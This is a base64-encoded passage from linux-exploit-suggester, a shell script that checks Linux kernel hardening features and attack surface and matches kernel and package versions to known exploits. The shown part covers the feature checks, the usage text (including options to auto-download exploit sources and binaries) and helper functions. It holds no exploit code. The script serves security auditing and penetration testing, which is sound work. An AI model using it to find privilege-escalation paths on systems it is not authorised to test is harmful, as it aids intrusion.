mFpbGFibGU6IENPTkZJR19IQVZFX1NUQUNLUFJPVEVDVE9SPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zdGFja3Byb3RlY3Rvci1yZWd1bGFyLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBHQ0Mgc3RhY2sgcHJvdGVjdG9yIFNUUk9ORyBzdXBwb3J0CmF2YWlsYWJsZTogQ09ORklHX1NUQUNLUFJPVEVDVE9SX1NUUk9ORz15LHZlcj49My4xNAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3N0YWNrcHJvdGVjdG9yLXN0cm9uZy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogTG93IGFkZHJlc3Mgc3BhY2UgdG8gcHJvdGVjdCBmcm9tIHVzZXIgYWxsb2NhdGlvbgphdmFpbGFibGU6IENPTkZJR19ERUZBVUxUX01NQVBfTUlOX0FERFI9WzAtOV0rCmVuYWJsZWQ6IHN5c2N0bDp2bS5tbWFwX21pbl9hZGRyIT0wCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvbW1hcF9taW5fYWRkci5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUHJldmVudCB1c2VycyBmcm9tIHVzaW5nIHB0cmFjZSB0byBleGFtaW5lIHRoZSBtZW1vcnkgYW5kIHN0YXRlIG9mIHRoZWlyIHByb2Nlc3NlcwphdmFpbGFibGU6IENPTkZJR19TRUNVUklUWV9ZQU1BPXkKZW5hYmxlZDogc3lzY3RsOmtlcm5lbC55YW1hLnB0cmFjZV9zY29wZSE9MAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3lhbWFfcHRyYWNlX3Njb3BlLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBSZXN0cmljdCB1bnByaXZpbGVnZWQgYWNjZXNzIHRvIGtlcm5lbCBzeXNsb2cKYXZhaWxhYmxlOiBDT05GSUdfU0VDVVJJVFlfRE1FU0dfUkVTVFJJQ1Q9eSx2ZXI+PTIuNi4zNwplbmFibGVkOiBzeXNjdGw6a2VybmVsLmRtZXNnX3Jlc3RyaWN0IT0wCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZG1lc2dfcmVzdHJpY3QubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFJhbmRvbWl6ZSB0aGUgYWRkcmVzcyBvZiB0aGUga2VybmVsIGltYWdlIChLQVNMUikKYXZhaWxhYmxlOiBDT05GSUdfUkFORE9NSVpFX0JBU0U9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2thc2xyLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBIYXJkZW5lZCB1c2VyIGNvcHkgc3VwcG9ydAphdmFpbGFibGU6IENPTkZJR19IQVJERU5FRF9VU0VSQ09QWT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvaGFyZGVuZWRfdXNlcmNvcHkubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IE1ha2Uga2VybmVsIHRleHQgYW5kIHJvZGF0YSByZWFkLW9ubHkKYXZhaWxhYmxlOiBDT05GSUdfU1RSSUNUX0tFUk5FTF9SV1g9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3N0cmljdF9rZXJuZWxfcnd4Lm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTZXQgbG9hZGFibGUga2VybmVsIG1vZHVsZSBkYXRhIGFzIE5YIGFuZCB0ZXh0IGFzIFJPCmF2YWlsYWJsZTogQ09ORklHX1NUUklDVF9NT0RVTEVfUldYPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zdHJpY3RfbW9kdWxlX3J3eC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQlVHKCkgY29uZGl0aW9ucyByZXBvcnRpbmcKYXZhaWxhYmxlOiBDT05GSUdfQlVHPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9idWcubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEFkZGl0aW9uYWwgJ2NyZWQnIHN0cnVjdCBjaGVja3MKYXZhaWxhYmxlOiBDT05GSUdfREVCVUdfQ1JFREVOVElBTFM9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2RlYnVnX2NyZWRlbnRpYWxzLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTYW5pdHkgY2hlY2tzIGZvciBub3RpZmllciBjYWxsIGNoYWlucwphdmFpbGFibGU6IENPTkZJR19ERUJVR19OT1RJRklFUlM9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2RlYnVnX25vdGlmaWVycy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogRXh0ZW5kZWQgY2hlY2tzIGZvciBsaW5rZWQtbGlzdHMgd2Fsa2luZwphdmFpbGFibGU6IENPTkZJR19ERUJVR19MSVNUPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZWJ1Z19saXN0Lm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBDaGVja3Mgb24gc2NhdHRlci1nYXRoZXIgdGFibGVzCmF2YWlsYWJsZTogQ09ORklHX0RFQlVHX1NHPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZWJ1Z19zZy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQ2hlY2tzIGZvciBkYXRhIHN0cnVjdHVyZSBjb3JydXB0aW9ucwphdmFpbGFibGU6IENPTkZJR19CVUdfT05fREFUQV9DT1JSVVBUSU9OPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9idWdfb25fZGF0YV9jb3JydXB0aW9uLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBDaGVja3MgZm9yIGEgc3RhY2sgb3ZlcnJ1biBvbiBjYWxscyB0byAnc2NoZWR1bGUnCmF2YWlsYWJsZTogQ09ORklHX1NDSEVEX1NUQUNLX0VORF9DSEVDSz15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc2NoZWRfc3RhY2tfZW5kX2NoZWNrLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBGcmVlbGlzdCBvcmRlciByYW5kb21pemF0aW9uIG9uIG5ldyBwYWdlcyBjcmVhdGlvbgphdmFpbGFibGU6IENPTkZJR19TTEFCX0ZSRUVMSVNUX1JBTkRPTT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc2xhYl9mcmVlbGlzdF9yYW5kb20ubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEZyZWVsaXN0IG1ldGFkYXRhIGhhcmRlbmluZwphdmFpbGFibGU6IENPTkZJR19TTEFCX0ZSRUVMSVNUX0hBUkRFTkVEPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zbGFiX2ZyZWVsaXN0X2hhcmRlbmVkLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBBbGxvY2F0b3IgdmFsaWRhdGlvbiBjaGVja2luZwphdmFpbGFibGU6IENPTkZJR19TTFVCX0RFQlVHX09OPXksY21kOiEgZ3JlcCAnc2x1Yl9kZWJ1Zz0tJyAvcHJvYy9jbWRsaW5lCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc2x1Yl9kZWJ1Zy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogVmlydHVhbGx5LW1hcHBlZCBrZXJuZWwgc3RhY2tzIHdpdGggZ3VhcmQgcGFnZXMKYXZhaWxhYmxlOiBDT05GSUdfVk1BUF9TVEFDSz15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvdm1hcF9zdGFjay5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUGFnZXMgcG9pc29uaW5nIGFmdGVyIGZyZWVfcGFnZXMoKSBjYWxsCmF2YWlsYWJsZTogQ09ORklHX1BBR0VfUE9JU09OSU5HPXkKZW5hYmxlZDogY21kOiBncmVwICdwYWdlX3BvaXNvbj0xJyAvcHJvYy9jbWRsaW5lCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvcGFnZV9wb2lzb25pbmcubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFVzaW5nICdyZWZjb3VudF90JyBpbnN0ZWFkIG9mICdhdG9taWNfdCcKYXZhaWxhYmxlOiBDT05GSUdfUkVGQ09VTlRfRlVMTD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvcmVmY291bnRfZnVsbC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogSGFyZGVuaW5nIGNvbW1vbiBzdHIvbWVtIGZ1bmN0aW9ucyBhZ2FpbnN0IGJ1ZmZlciBvdmVyZmxvd3MKYXZhaWxhYmxlOiBDT05GSUdfRk9SVElGWV9TT1VSQ0U9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2ZvcnRpZnlfc291cmNlLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBSZXN0cmljdCAvZGV2L21lbSBhY2Nlc3MKYXZhaWxhYmxlOiBDT05GSUdfU1RSSUNUX0RFVk1FTT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc3RyaWN0X2Rldm1lbS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUmVzdHJpY3QgSS9PIGFjY2VzcyB0byAvZGV2L21lbQphdmFpbGFibGU6IENPTkZJR19JT19TVFJJQ1RfREVWTUVNPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9pb19zdHJpY3RfZGV2bWVtLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpzZWN0aW9uOiBIYXJkd2FyZS1iYXNlZCBwcm90ZWN0aW9uIGZlYXR1cmVzOgpFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogU3VwZXJ2aXNvciBNb2RlIEV4ZWN1dGlvbiBQcm90ZWN0aW9uIChTTUVQKSBzdXBwb3J0CmF2YWlsYWJsZTogdmVyPj0zLjAKZW5hYmxlZDogY21kOmdyZXAgLXFpIHNtZXAgL3Byb2MvY3B1aW5mbwphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NtZXAubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN1cGVydmlzb3IgTW9kZSBBY2Nlc3MgUHJldmVudGlvbiAoU01BUCkgc3VwcG9ydAphdmFpbGFibGU6IHZlcj49My43CmVuYWJsZWQ6IGNtZDpncmVwIC1xaSBzbWFwIC9wcm9jL2NwdWluZm8KYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zbWFwLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpzZWN0aW9uOiAzcmQgcGFydHkga2VybmVsIHByb3RlY3Rpb24gbWVjaGFuaXNtczoKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEdyc2VjdXJpdHkKYXZhaWxhYmxlOiBDT05GSUdfR1JLRVJOU0VDPXkKZW5hYmxlZDogY21kOnRlc3QgLWMgL2Rldi9ncnNlYwpFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUGFYCmF2YWlsYWJsZTogQ09ORklHX1BBWD15CmVuYWJsZWQ6IGNtZDp0ZXN0IC14IC9zYmluL3BheGN0bApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogTGludXggS2VybmVsIFJ1bnRpbWUgR3VhcmQgKExLUkcpIGtlcm5lbCBtb2R1bGUKZW5hYmxlZDogY21kOnRlc3QgLWQgL3Byb2Mvc3lzL2xrcmcKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9sa3JnLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpzZWN0aW9uOiBBdHRhY2sgU3VyZmFjZToKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFVzZXIgbmFtZXNwYWNlcyBmb3IgdW5wcml2aWxlZ2VkIGFjY291bnRzCmF2YWlsYWJsZTogQ09ORklHX1VTRVJfTlM9eQplbmFibGVkOiBzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9PTEKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy91c2VyX25zLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBVbnByaXZpbGVnZWQgYWNjZXNzIHRvIGJwZigpIHN5c3RlbSBjYWxsCmF2YWlsYWJsZTogQ09ORklHX0JQRl9TWVNDQUxMPXkKZW5hYmxlZDogc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkIT0xCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvYnBmX3N5c2NhbGwubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN5c2NhbGxzIGZpbHRlcmluZwphdmFpbGFibGU6IENPTkZJR19TRUNDT01QPXkKZW5hYmxlZDogY21kOmdyZXAgLWkgU2VjY29tcCAvcHJvYy9zZWxmL3N0YXR1cyB8IGF3ayAne3ByaW50IFwkMn0nCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvYnBmX3N5c2NhbGwubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN1cHBvcnQgZm9yIC9kZXYvbWVtIGFjY2VzcwphdmFpbGFibGU6IENPTkZJR19ERVZNRU09eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2Rldm1lbS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogU3VwcG9ydCBmb3IgL2Rldi9rbWVtIGFjY2VzcwphdmFpbGFibGU6IENPTkZJR19ERVZLTUVNPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZXZrbWVtLm1kCkVPRgopCgoKdmVyc2lvbigpIHsKICAgIGVjaG8gImxpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyICIkVkVSU0lPTiIsIG16ZXQsIGh0dHBzOi8vei1sYWJzLmV1LCBNYXJjaCAyMDE5Igp9Cgp1c2FnZSgpIHsKICAgIGVjaG8gIkxFUyB2ZXIuICRWRVJTSU9OIChodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGludXgtZXhwbG9pdC1zdWdnZXN0ZXIpIGJ5IEBfbXpldF8iCiAgICBlY2hvCiAgICBlY2hvICJVc2FnZTogbGludXgtZXhwbG9pdC1zdWdnZXN0ZXIuc2ggW09QVElPTlNdIgogICAgZWNobwogICAgZWNobyAiIC1WIHwgLS12ZXJzaW9uICAgICAgICAgICAgICAgLSBwcmludCB2ZXJzaW9uIG9mIHRoaXMgc2NyaXB0IgogICAgZWNobyAiIC1oIHwgLS1oZWxwICAgICAgICAgICAgICAgICAgLSBwcmludCB0aGlzIGhlbHAiCiAgICBlY2hvICIgLWsgfCAtLWtlcm5lbCA8dmVyc2lvbj4gICAgICAtIHByb3ZpZGUga2VybmVsIHZlcnNpb24iCiAgICBlY2hvICIgLXUgfCAtLXVuYW1lIDxzdHJpbmc+ICAgICAgICAtIHByb3ZpZGUgJ3VuYW1lIC1hJyBzdHJpbmciCiAgICBlY2hvICIgLS1za2lwLW1vcmUtY2hlY2tzICAgICAgICAgICAtIGRvIG5vdCBwZXJmb3JtIGFkZGl0aW9uYWwgY2hlY2tzIChrZXJuZWwgY29uZmlnLCBzeXNjdGwpIHRvIGRldGVybWluZSBpZiBleHBsb2l0IGlzIGFwcGxpY2FibGUiCiAgICBlY2hvICIgLS1za2lwLXBrZy12ZXJzaW9ucyAgICAgICAgICAtIHNraXAgY2hlY2tpbmcgZm9yIGV4YWN0IHVzZXJzcGFjZSBwYWNrYWdlIHZlcnNpb24gKGhlbHBzIHRvIGF2b2lkIGZhbHNlIG5lZ2F0aXZlcykiCiAgICBlY2hvICIgLXAgfCAtLXBrZ2xpc3QtZmlsZSA8ZmlsZT4gICAtIHByb3ZpZGUgZmlsZSB3aXRoICdkcGtnIC1sJyBvciAncnBtIC1xYScgY29tbWFuZCBvdXRwdXQiCiAgICBlY2hvICIgLS1jdmVsaXN0LWZpbGUgPGZpbGU+ICAgICAgICAtIHByb3ZpZGUgZmlsZSB3aXRoIExpbnV4IGtlcm5lbCBDVkVzIGxpc3QiCiAgICBlY2hvICIgLS1jaGVja3NlYyAgICAgICAgICAgICAgICAgICAtIGxpc3Qgc2VjdXJpdHkgcmVsYXRlZCBmZWF0dXJlcyBmb3IgeW91ciBIVy9rZXJuZWwiCiAgICBlY2hvICIgLXMgfCAtLWZldGNoLXNvdXJjZXMgICAgICAgICAtIGF1dG9tYXRpY2FsbHkgZG93bmxvYWRzIHNvdXJjZSBmb3IgbWF0Y2hlZCBleHBsb2l0IgogICAgZWNobyAiIC1iIHwgLS1mZXRjaC1iaW5hcmllcyAgICAgICAgLSBhdXRvbWF0aWNhbGx5IGRvd25sb2FkcyBiaW5hcnkgZm9yIG1hdGNoZWQgZXhwbG9pdCBpZiBhdmFpbGFibGUiCiAgICBlY2hvICIgLWYgfCAtLWZ1bGwgICAgICAgICAgICAgICAgICAtIHNob3cgZnVsbCBpbmZvIGFib3V0IG1hdGNoZWQgZXhwbG9pdCIKICAgIGVjaG8gIiAtZyB8IC0tc2hvcnQgICAgICAgICAgICAgICAgIC0gc2hvdyBzaG9ydGVuIGluZm8gYWJvdXQgbWF0Y2hlZCBleHBsb2l0IgogICAgZWNobyAiIC0ta2VybmVsc3BhY2Utb25seSAgICAgICAgICAgLSBzaG93IG9ubHkga2VybmVsIHZ1bG5lcmFiaWxpdGllcyIKICAgIGVjaG8gIiAtLXVzZXJzcGFjZS1vbmx5ICAgICAgICAgICAgIC0gc2hvdyBvbmx5IHVzZXJzcGFjZSB2dWxuZXJhYmlsaXRpZXMiCiAgICBlY2hvICIgLWQgfCAtLXNob3ctZG9zICAgICAgICAgICAgICAtIHNob3cgYWxzbyBEb1NlcyBpbiByZXN1bHRzIgp9CgpleGl0V2l0aEVyck1zZygpIHsKICAgIGVjaG8gIiQxIiAxPiYyCiAgICBleGl0IDEKfQoKIyBleHRyYWN0cyBhbGwgaW5mb3JtYXRpb24gZnJvbSBvdXRwdXQgb2YgJ3VuYW1lIC1hJyBjb21tYW5kCnBhcnNlVW5hbWUoKSB7CiAgICBsb2NhbCB1bmFtZT0kMQoKICAgIEtFUk5FTD0kKGVjaG8gIiR1bmFtZSIgfCBhd2sgJ3twcmludCAkM30nIHwgY3V0IC1kICctJyAtZiAxKQogICAgS0VSTkVMX0FMTD0kKGVjaG8gIiR1bmFtZSIgfCBhd2sgJ3twcmludCAkM30nKQogICAgQVJDSD0kKGVjaG8gIiR1bmFtZSIgfCBhd2sgJ3twcmludCAkKE5GLTEpfScpCgogICAgT1M9IiIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdkZWInICYmIE9TPSJkZWJpYW4iCiAgICBlY2hvICIkdW5hbWUiIHwgZ3JlcCAtcSAtaSAndWJ1bnR1JyAmJiBPUz0idWJ1bnR1IgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ1wtQVJDSCcgJiYgT1M9ImFyY2giCiAgICBlY2hvICIkdW5hbWUiIHwgZ3JlcCAtcSAtaSAnXC1kZWVwaW4nICYmIE9TPSJkZWVwaW4iCiAgICBlY2hvICIkdW5hbWUiIHwgZ3JlcCAtcSAtaSAnXC1NQU5KQVJPJyAmJiBPUz0ibWFuamFybyIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLmZjJyAmJiBPUz0iZmVkb3JhIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ1wuZWwnICYmIE9TPSJSSEVMIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ1wubWdhJyAmJiBPUz0ibWFnZWlhIgoKICAgICMgJ3VuYW1lIC1hJyBvdXRwdXQgZG9lc24ndCBjb250YWluIGRpc3RyaWJ1dGlvbiBudW1iZXIgKGF0IGxlYXN0IG5vdCBpbiBjYXNlIG9mIGFsbCBkaXN0cm9zKQp9CgpnZXRQa2dMaXN0KCkgewogICAgbG9jYWwgZGlzdHJvPSQxCiAgICBsb2NhbCBwa2dsaXN0X2ZpbGU9JDIKICAgIAogICAgIyB0YWtlIHBhY2thZ2UgbGlzdGluZyBmcm9tIHByb3ZpZGVkIGZpbGUgJiBkZXRlY3QgaWYgaXQncyAncnBtIC1xYScgbGlzdGluZyBvciAnZHBrZyAtbCcgb3IgJ3BhY21hbiAtUScgbGlzdGluZyBvZiBub3QgcmVjb2duaXplZCBsaXN0aW5nCiAgICBpZiBbICIkb3B0X3BrZ2xpc3RfZmlsZSIgPSAidHJ1ZSIgLWEgLWUgIiRwa2dsaXN0X2ZpbGUiIF07IHRoZW4KCiAgICAgICAgIyB1YnVudHUvZGViaWFuIHBhY2thZ2UgbGlzdGluZyBmaWxlCiAgICAgICAgaWYgWyAkKGhlYWQgLTEgIiRwa2dsaXN0X2ZpbGUiIHwgZ3JlcCAnRGVzaXJlZD1Vbmtub3duL0luc3RhbGwvUmVtb3ZlL1B1cmdlL0hvbGQnKSBdOyB0aGVuCiAgICAgICAgICAgIFBLR19MSVNUPSQoY2F0ICIkcGtnbGlzdF9maWxlIiB8IGF3ayAne3ByaW50ICQyIi0iJDN9JyB8IHNlZCAncy86YW1kNjQvL2cnKQoKICAgICAgICAgICAgT1M9ImRlYmlhbiIKICAgICAgICAgICAgWyAiJChncmVwIHVidW50dSAiJHBrZ2xpc3RfZmlsZSIpIiBdICYmIE9TPSJ1YnVudHUiCiAgICAgICAgIyByZWRoYXQgcGFja2FnZSBsaXN0aW5nIGZpbGUKICAgICAgICBlbGlmIFsgIiQoZ3JlcCAtRSAnXC5lbFsxLTldK1tcLl9dJyAiJHBrZ2xpc3RfZmlsZSIgfCBoZWFkIC0xKSIgXTsgdGhlbgogICAgICAgICAgICBQS0dfTElTVD0kKGNhdCAiJHBrZ2xpc3RfZmlsZSIpCiAgICAgICAgICAgIE9TPSJSSEVMIgogICAgICAgICMgZmVkb3JhIHBhY2thZ2UgbGlzdGluZyBmaWxlCiAgICAgICAgZWxpZiBbICIkKGdyZXAgLUUgJ1wuZmNbMS05XSsnaSAiJHBrZ2xpc3RfZmlsZSIgfCBoZWFkIC0xKSIgXTsgdGhlbgogICAgICAgICAgICBQS0dfTElTVD0kKGNhdCAiJHBrZ2xpc3RfZmlsZSIpCiAgICAgICAgICAgIE9TPSJmZWRvcmEiCiAgICAgICAgIyBtYWdlaWEgcGFja2FnZSBsaXN0aW5nIGZpbGUKICAgICAgICBlbGlmIFsgIiQoZ3JlcCAtRSAnXC5tZ2FbMS05XSsnICIkcGtnbGlzdF9maWxlIiB8IGhlYWQgLTEpIiBdOyB0aGVuCiAgICAgICAgICAgIFBLR19MSVNUPSQoY2F0ICIkcGtnbGlzdF9maWxlIikKICAgICAgICAgICAgT1M9Im1hZ2VpYSIKICAgICAgICAjIHBhY21hbiBwYWNrYWdlIGxpc3RpbmcgZmlsZQogICAgICAgIGVsaWYgWyAiJChncmVwIC1FICdcIFswLTldK1wuJyAiJHBrZ2xpc3RfZmlsZSIgfCBoZWFkIC0xKSIgXTsgdGhlbgogICAgICAgICAgICBQS0dfTElTVD0kKGNhdCAiJHBrZ2xpc3RfZmlsZSIgfCBhd2sgJ3twcmludCAkMSItIiQyfScpCiAgICAgICAgICAgIE9TPSJhcmNoIgogICAgICAgICMgZmlsZSBub3QgcmVjb2duaXplZCAtIHNraXBwaW5nCiAgICAgICAgZWxzZQogICAgICAgICAgICBQS0dfTElTVD0iIgogICAgICAgIGZpCgogICAgZWxpZiBbICIkZGlzdHJvIiA9ICJkZWJpYW4iIC1vICIkZGlzdHJvIiA9ICJ1YnVudHUiIC1vICIkZGlzdHJvIiA9ICJkZWVwaW4iIF07IHRoZW4KICAgICAgICBQS0dfTElTVD0kKGRwa2cgLWwgfCBhd2sgJ3twcmludCAkMiItIiQzfScgfCBzZWQgJ3MvOmFtZDY0Ly9nJykKICAgIGVsaWYgWyAiJGRpc3RybyIgPSAiUkhFTCIgLW8gIiRkaXN0cm8iID0gImZlZG9yYSIgLW8gIiRkaXN0cm8iID0gIm1hZ2VpYSIgXTsgdGhlbgogICAgICAgIFBLR19MSVNUPSQocnBtIC1x